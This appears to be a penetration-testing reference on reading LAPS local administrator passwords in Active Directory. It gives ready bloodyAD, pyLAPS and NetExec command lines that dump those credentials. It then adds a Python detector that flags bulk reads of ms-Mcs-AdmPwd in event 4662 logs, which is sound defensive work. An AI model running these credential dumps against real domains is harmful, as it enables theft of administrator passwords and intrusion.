ReadLAPSPassword
This abuse can be carried out when controlling an object that has GenericAll or AllExtendedRights (or the combination of GetChanges and either GetChangesInFilteredSet or GetChangesAll, for domain-wide synchronization) over the target computer configured for LAPS. The attacker can then read the LAPS password of the computer account (i.e. the password of the computer's local administrator).
Alternative #1: Using bloodyAD
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
Alternative #2: pyLAPS (Python)
pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101
Alternative #3: NetExec also has this ability. If it doesn't work, this public module for CrackMapExec can be used instead.
# Default command
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
# The computer filter can be a name or a wildcard (e.g. WIN-S10, WIN-*; default: *)
nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Impacket's ntlmrelayx also has this feature, enabled with its --dump-laps option.
Alternative #4: LAPSDumper is another Python alternative.
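An added detection example (my own code, not from the page or from any of the tools above). Once LAPS auditing is enabled on the computers' OU (Set-AdmPwdAuditing from the AdmPwd.PS module), every read of ms-Mcs-AdmPwd, including the dumps above, lands on the domain controller as Security event 4662 with a Read Property access on that attribute's GUID. The script below scans constructed 4662 records for such reads and flags any principal reading many computers' passwords in a short window; the attribute GUID is a placeholder to replace with your schema's value, and the field layout, sample accounts and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Placeholder GUID: substitute the schemaIDGUID of ms-Mcs-AdmPwd from your own forest schema.
LAPS_PWD_GUID = "{00000000-0000-0000-0000-0000000000aa}"
READ_PROPERTY = 0x10  # ADS_RIGHT_DS_READ_PROP bit of the 4662 AccessMask
GUID_RE = re.compile(r"\{[0-9a-f-]{36}\}", re.IGNORECASE)

def ev(ts, user, computer, guid=LAPS_PWD_GUID, mask="0x10"):
    # One constructed 4662 record, shaped like a SIEM's parsed EventData fields (assumed layout).
    return {"time": ts, "SubjectUserName": user, "AccessMask": mask,
            "ObjectName": f"CN={computer},OU=Workstations,DC=corp,DC=local",
            "Properties": f"%%7688\r\n\t{guid}"}

# Constructed feed, not real logs: one helpdesk read, two non-matching events, then one
# account reading five computers within seconds (the shape of a wildcard dump).
SAMPLE_EVENTS = [ev("2024-05-01T10:00:01", "helpdesk01", "WS01"),
                 ev("2024-05-01T10:05:00", "helpdesk01", "WS02", mask="0x20"),  # Write Property
                 ev("2024-05-01T10:06:00", "helpdesk01", "WS03", guid="{11111111-2222-3333-4444-555555555555}"),
                 ev("2024-05-01T11:00:00", "jdoe", "WS01"), ev("2024-05-01T11:00:01", "jdoe", "WS02"),
                 ev("2024-05-01T11:00:02", "jdoe", "WS03"), ev("2024-05-01T11:00:03", "jdoe", "WS04"),
                 ev("2024-05-01T11:00:04", "jdoe", "WS05")]

def is_laps_read(event):
    """True when the event is a Read Property access that touched ms-Mcs-AdmPwd."""
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    return bool(int(event["AccessMask"], 16) & READ_PROPERTY) and LAPS_PWD_GUID.lower() in guids

def laps_reads(events):
    """(subject, computer, timestamp) for every LAPS password read in the feed."""
    out = []
    for e in events:
        if is_laps_read(e):
            computer = e["ObjectName"].split(",", 1)[0].removeprefix("CN=")
            out.append((e["SubjectUserName"], computer, datetime.fromisoformat(e["time"])))
    return out

def bulk_readers(events, threshold=5, window=timedelta(minutes=10)):
    """Subjects that read >= threshold distinct computers' LAPS passwords inside one window."""
    per_subject = defaultdict(list)
    for subj, computer, ts in laps_reads(events):
        per_subject[subj].append((ts, computer))
    flagged = {}
    for subj, reads in per_subject.items():
        reads.sort()  # sliding window over the subject's reads in time order
        for i, (start, _) in enumerate(reads):
            hosts = {c for ts, c in reads[i:] if ts - start <= window}
            if len(hosts) >= threshold:
                flagged[subj] = len(hosts)
                break
    return flagged
```

Tune threshold and window to how many LAPS passwords a legitimate helpdesk session reads in your environment; a single read by a known administrator is normal, one account sweeping the whole OU is not.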